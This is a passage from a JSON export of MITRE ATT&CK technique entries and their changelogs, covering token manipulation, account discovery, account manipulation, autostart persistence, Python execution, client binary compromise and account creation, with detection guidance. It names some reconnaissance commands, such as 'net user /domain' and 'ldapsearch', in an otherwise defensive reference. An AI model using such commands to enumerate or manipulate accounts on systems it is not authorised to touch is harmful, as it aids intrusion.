"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1134",
"external_id": "T1134"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/633.html",
"external_id": "CAPEC-633"
},
{
"source_name": "Pentestlab Token Manipulation",
"description": "netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017.",
"url": "https://pentestlab.blog/2017/04/03/token-manipulation/"
},
{
"source_name": "Microsoft Command-line Logging",
"description": "Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.",
"url": "https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing"
},
{
"source_name": "Microsoft LogonUser",
"description": "Microsoft TechNet. (n.d.). Retrieved April 25, 2017.",
"url": "https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx"
},
{
"source_name": "Microsoft DuplicateTokenEx",
"description": "Microsoft TechNet. (n.d.). Retrieved April 25, 2017.",
"url": "https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx"
},
{
"source_name": "Microsoft ImpersonateLoggedOnUser",
"description": "Microsoft TechNet. (n.d.). Retrieved April 25, 2017.",
"url": "https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx"
},
{
"source_name": "BlackHat Atkinson Winchester Token Manipulation",
"description": "Atkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017.",
"url": "https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Tom Ueltschi @c_APT_ure",
"Travis Smith, Tripwire",
"Robby Winchester, @robwinchester3",
"Jared Atkinson, @jaredcatkinson"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Process: Process Metadata",
"Process: OS API Execution",
"User Account: User Account Metadata",
"Active Directory: Active Directory Object Modification",
"Command: Command Execution"
],
"x_mitre_defense_bypassed": [
"Windows User Account Control",
"System access controls",
"File system access controls",
"Heuristic Detection",
"Host forensic analysis"
],
"x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. \n\nThere are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.\n\nQuery systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.",
"x_mitre_effective_permissions": [
"SYSTEM"
],
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"Administrator"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "2.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-17 14:51:49.334000+00:00\", \"old_value\": \"2021-04-24 13:40:52.952000+00:00\"}}}",
"previous_version": "2.0",
"changelog_mitigations": {
"shared": [
"M1018: User Account Management",
"M1026: Privileged Account Management",
"T1134: Access Token Manipulation Mitigation"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0002: User Account (User Account Metadata)",
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Creation)",
"DS0009: Process (Process Metadata)",
"DS0017: Command (Command Execution)",
"DS0026: Active Directory (Active Directory Object Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2017-05-31 21:31:06.988000+00:00",
"modified": "2021-10-13 14:05:15.038000+00:00",
"name": "Account Discovery",
"description": "Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1087",
"external_id": "T1087"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/575.html",
"external_id": "CAPEC-575"
},
{
"source_name": "Elastic - Koadiac Detection with EQL",
"description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.",
"url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Daniel Stepanic, Elastic",
"Microsoft Threat Intelligence Center (MSTIC)",
"Travis Smith, Tripwire"
],
"x_mitre_data_sources": [
"User Account: User Account Metadata",
"Command: Command Execution",
"Process: Process Creation",
"File: File Access"
],
"x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows",
"Azure AD",
"Office 365",
"SaaS",
"IaaS",
"Linux",
"macOS",
"Google Workspace"
],
"x_mitre_version": "2.3",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-13 14:05:15.038000+00:00\", \"old_value\": \"2021-04-14 12:26:11.595000+00:00\"}}}",
"previous_version": "2.3",
"changelog_mitigations": {
"shared": [
"M1028: Operating System Configuration",
"T1087: Account Discovery Mitigation"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0002: User Account (User Account Metadata)",
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Access)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-02-21 21:08:26.480000+00:00",
"modified": "2021-10-13 14:05:14.784000+00:00",
"name": "Domain Account",
"description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.\n\nCommands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1087/002",
"external_id": "T1087.002"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/575.html",
"external_id": "CAPEC-575"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution"
],
"x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-13 14:05:14.784000+00:00\", \"old_value\": \"2020-03-26 13:42:34.402000+00:00\"}, \"root['x_mitre_detection']\": {\"new_value\": \"System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\\n\\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\\n\", \"old_value\": \"System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\\n\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1,3 @@\\n System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\\n+\\n Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\"}}}",
"previous_version": "1.0",
"changelog_mitigations": {
"shared": [
"M1028: Operating System Configuration"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2017-05-31 21:31:12.196000+00:00",
"modified": "2021-10-18 18:57:04.505000+00:00",
"name": "Account Manipulation",
"description": "Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1098",
"external_id": "T1098"
},
{
"source_name": "Microsoft User Modified Event",
"description": "Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017.",
"url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738"
},
{
"source_name": "Microsoft Security Event 4670",
"description": "Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019.",
"url": "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670"
},
{
"source_name": "InsiderThreat ChangeNTLM July 2017",
"description": "Warren, J. (2017, July 11). Manipulating User Passwords with Mimikatz. Retrieved December 4, 2017.",
"url": "https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM"
},
{
"source_name": "GitHub Mimikatz Issue 92 June 2017",
"description": "Warren, J. (2017, June 22). lsadump::changentlm and lsadump::setntlm work, but generate Windows events #92. Retrieved December 4, 2017.",
"url": "https://github.com/gentilkiwi/mimikatz/issues/92"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)",
"Praetorian",
"Tim MalcomVetter"
],
"x_mitre_data_sources": [
"File: File Modification",
"Command: Command Execution",
"Process: Process Creation",
"Group: Group Modification",
"User Account: User Account Modification",
"Active Directory: Active Directory Object Modification"
],
"x_mitre_detection": "Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.\n\nMonitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Windows",
"Azure AD",
"Office 365",
"IaaS",
"Linux",
"macOS",
"Google Workspace"
],
"x_mitre_version": "2.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 18:57:04.505000+00:00\", \"old_value\": \"2021-04-20 16:21:28.502000+00:00\"}}}",
"previous_version": "2.2",
"changelog_mitigations": {
"shared": [
"M1026: Privileged Account Management",
"M1028: Operating System Configuration",
"M1030: Network Segmentation",
"M1032: Multi-factor Authentication"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0002: User Account (User Account Modification)",
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Modification)",
"DS0026: Active Directory (Active Directory Object Modification)",
"DS0036: Group (Group Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2017-05-31 21:30:29.458000+00:00",
"modified": "2021-08-16 15:23:38.940000+00:00",
"name": "Automated Exfiltration",
"description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "exfiltration"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1020",
"external_id": "T1020"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"ExtraHop"
],
"x_mitre_data_sources": [
"Command: Command Execution",
"Script: Script Execution",
"Network Traffic: Network Connection Creation",
"Network Traffic: Network Traffic Flow",
"Network Traffic: Network Traffic Content",
"File: File Access"
],
"x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.",
"x_mitre_is_subtechnique": false,
"x_mitre_network_requirements": true,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows",
"Network"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-16 15:23:38.940000+00:00\", \"old_value\": \"2021-04-22 20:21:10.590000+00:00\"}}}",
"previous_version": "1.2",
"changelog_mitigations": {
"shared": [
"T1020: Automated Exfiltration Mitigation"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0012: Script (Script Execution)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Access)",
"DS0029: Network Traffic (Network Connection Creation)",
"DS0029: Network Traffic (Network Traffic Content)",
"DS0029: Network Traffic (Network Traffic Flow)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-23 17:46:59.535000+00:00",
"modified": "2021-10-19 04:03:47.056000+00:00",
"name": "Boot or Logon Autostart Execution",
"description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)\u00a0 These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1547",
"external_id": "T1547"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/564.html",
"external_id": "CAPEC-564"
},
{
"source_name": "Microsoft Run Key",
"description": "Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.",
"url": "http://msdn.microsoft.com/en-us/library/aa376977"
},
{
"source_name": "MSDN Authentication Packages",
"description": "Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.",
"url": "https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx"
},
{
"source_name": "Microsoft TimeProvider",
"description": "Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.",
"url": "https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx"
},
{
"source_name": "Cylance Reg Persistence Sept 2013",
"description": "Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.",
"url": "https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order"
},
{
"source_name": "Linux Kernel Programming",
"description": "Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.",
"url": "https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf"
},
{
"source_name": "TechNet Autoruns",
"description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.",
"url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"File: File Creation",
"Windows Registry: Windows Registry Key Creation",
"Windows Registry: Windows Registry Key Modification",
"File: File Modification",
"Command: Command Execution",
"Process: Process Creation",
"Module: Module Load",
"Kernel: Kernel Module Load",
"Driver: Driver Load",
"Process: OS API Execution"
],
"x_mitre_detection": "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns) Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. \n\nSuspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"Administrator",
"root"
],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-19 04:03:47.056000+00:00\", \"old_value\": \"2021-04-24 13:50:12.837000+00:00\"}}}",
"previous_version": "1.1",
"changelog_mitigations": {
"shared": [],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0008: Kernel (Kernel Module Load)",
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Creation)",
"DS0011: Module (Module Load)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Creation)",
"DS0022: File (File Modification)",
"DS0024: Windows Registry (Windows Registry Key Creation)",
"DS0024: Windows Registry (Windows Registry Key Modification)",
"DS0027: Driver (Driver Load)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-03-09 14:38:24.334000+00:00",
"modified": "2021-07-26 22:49:23.094000+00:00",
"name": "Python",
"description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.\n\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1059/006",
"external_id": "T1059.006"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Command: Command Execution",
"Process: Process Creation"
],
"x_mitre_detection": "Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"SYSTEM",
"root"
],
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
],
"x_mitre_remote_support": false,
"x_mitre_system_requirements": [
"Python is installed."
],
"x_mitre_version": "1.0",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-07-26 22:49:23.094000+00:00\", \"old_value\": \"2020-06-23 19:03:15.180000+00:00\"}}}",
"previous_version": "1.0",
"changelog_mitigations": {
"shared": [
"M1033: Limit Software Installation",
"M1038: Execution Prevention",
"M1047: Audit",
"M1049: Antivirus/Antimalware"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-02-11 18:18:34.279000+00:00",
"modified": "2021-10-19 03:18:43.648000+00:00",
"name": "Compromise Client Software Binary",
"description": "Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.\n\nAdversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1554",
"external_id": "T1554"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"CrowdStrike Falcon OverWatch"
],
"x_mitre_data_sources": [
"File: File Modification",
"File: File Creation",
"File: File Deletion",
"File: File Metadata"
],
"x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-19 03:18:43.648000+00:00\", \"old_value\": \"2020-03-27 14:49:58.249000+00:00\"}}}",
"previous_version": "1.0",
"changelog_mitigations": {
"shared": [
"M1045: Code Signing"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0022: File (File Creation)",
"DS0022: File (File Deletion)",
"DS0022: File (File Metadata)",
"DS0022: File (File Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2017-12-14 16:46:06.044000+00:00",
"modified": "2021-08-12 13:04:14.534000+00:00",
"name": "Create Account",
"description": "Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\n\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1136",
"external_id": "T1136"
},
{
"source_name": "Microsoft User Creation Event",
"description": "Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.",
"url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Microsoft Threat Intelligence Center (MSTIC)",
"Praetorian"
],
"x_mitre_data_sources": [
"User Account: User Account Creation",
"Process: Process Creation",
"Command: Command Execution"
],
"x_mitre_detection": "Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.\n\nCollect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"Administrator"
],
"x_mitre_platforms": [
"Windows",
"Azure AD",
"Office 365",
"IaaS",
"Linux",
"macOS",
"Google Workspace"
],
"x_mitre_version": "2.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-12 13:04:14.534000+00:00\", \"old_value\": \"2021-03-16 12:47:00.458000+00:00\"}}}",
"previous_version": "2.2",
"changelog_mitigations": {
"shared": [
"M1026: Privileged Account Management",
"M1028: Operating System Configuration",
"M1030: Network Segmentation",
"M1032: Multi-factor Authentication",
"T1136: Create Account Mitigation"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0002: User Account (User Account Creation)",
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-10 16:03:18.865000+00:00",
"modified": "2021-10-15 07:41:41.496000+00:00",
"name": "Create or Modify System Process",
